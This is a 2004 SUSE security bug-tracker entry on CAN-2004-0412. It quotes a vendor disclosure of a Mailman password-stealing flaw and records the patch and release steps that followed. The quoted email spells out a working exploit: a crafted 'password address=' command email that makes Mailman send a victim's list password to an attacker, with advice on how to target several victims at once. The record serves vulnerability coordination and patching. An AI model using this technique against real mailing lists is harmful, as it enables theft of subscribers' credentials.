Bug 55868 (suse40868)

Summary: mailman password stealing
Product: [Novell Products] SUSE Security Incidents Reporter: Sebastian Krahmer <krahmer>
Component: IncidentsAssignee: Heiko Rommel <heiko.rommel>
Status: RESOLVED FIXED QA Contact: Security Team bot <security-team>
Severity: Major    
Priority: P3 - Medium CC: dmueller, security-team
Version: unspecified   
Target Milestone: ---   
Hardware: All   
OS: Linux   
Whiteboard:
Found By: --- Services Priority:
Business Priority: Blocker: ---
Marketing QA Status: --- IT Deployment: ---
Attachments: the patch
patchinfo for box

Description Sebastian Krahmer 2004-05-19 20:21:29 UTC 
From: Mark J Cox <mjc@redhat.com>
To: vendor-sec@lst.de
Cc: barry@python.org, jdennis@redhat.com
Subject: [vendor-sec] CAN-2004-0412 Mailman password stealing
Parts/Attachments:
   1 Shown     36 lines  Text
   2   OK    ~1.4 KB     Text, ""
----------------------------------------

We noticed a security flaw mentioned in Mailman as part of the 2.1.5 
release.  See:
http://mail.python.org/pipermail/mailman-announce/2004-May/000072.html

I tracked down the issue this morning and worked out an easy exploit:

Send the following email (From: address doesn't matter)

--
To: fedora-devel-list-request@redhat.com

password address=markcox@gmail.com
password address=mjc@redhat.com
--

This will cause mailman to send the fedora-devel-list mailman password
belonging to markcox@gmail.com (victim) to mjc@redhat.com (attacker).  
mjc@redhat.com doesn't have to be a subscriber to the list. Therefore you
can effectively steal the passwords for any subscribers if you know who is
subscribed.  You can add in more "password address=victim"  lines before
the final line to retrieve multiple passwords (leaving the last line
intact pointing to you, to make sure that final email gets sent to you)

Patch for just this issue extracted from the big 2.1.4-2.1.5 diff is
attached.  Barry has confirmed this is correct.

This issue doesn't seem to affect 2.0.13 (the function is
ProcessPasswordCmd in MailCommandHandler.py doesn't let you switch users).

Anyway, this is public, but no one seems to have noticed so I allocated
CAN-2004-0412 to it anyway.  If Debian or FreeBSD noticed and allocated a
name please reply on list asap.
Comment 1 Sebastian Krahmer 2004-05-19 20:21:29 UTC 
<!-- SBZ_reproduce  -->
...
Comment 2 Sebastian Krahmer 2004-05-19 20:22:16 UTC 
Created attachment 19921 [details]
the patch

...
Comment 3 Heiko Rommel 2004-05-24 20:36:23 UTC 
I can confirm the efficacy of both the exploit and the suggested fix.
Doing checkin right now. Affected distris are 8.2, 9.0 and 9.1.
Security team, please provided a patchinfo ;)
Comment 4 Sebastian Krahmer 2004-05-24 20:44:28 UTC 
Created attachment 20122 [details]
patchinfo for box

...
Comment 5 Sebastian Krahmer 2004-05-24 20:44:52 UTC 
Patchinfo submitted, please tell suse-dist.
Comment 6 Heiko Rommel 2004-05-24 20:55:35 UTC 
Done.
Comment 7 Sebastian Krahmer 2004-05-26 20:01:49 UTC 
Approved package. It was SL only, so no QA.
Comment 8 Heiko Rommel 2004-05-27 19:10:37 UTC 
*** Bug 56294 has been marked as a duplicate of this bug. ***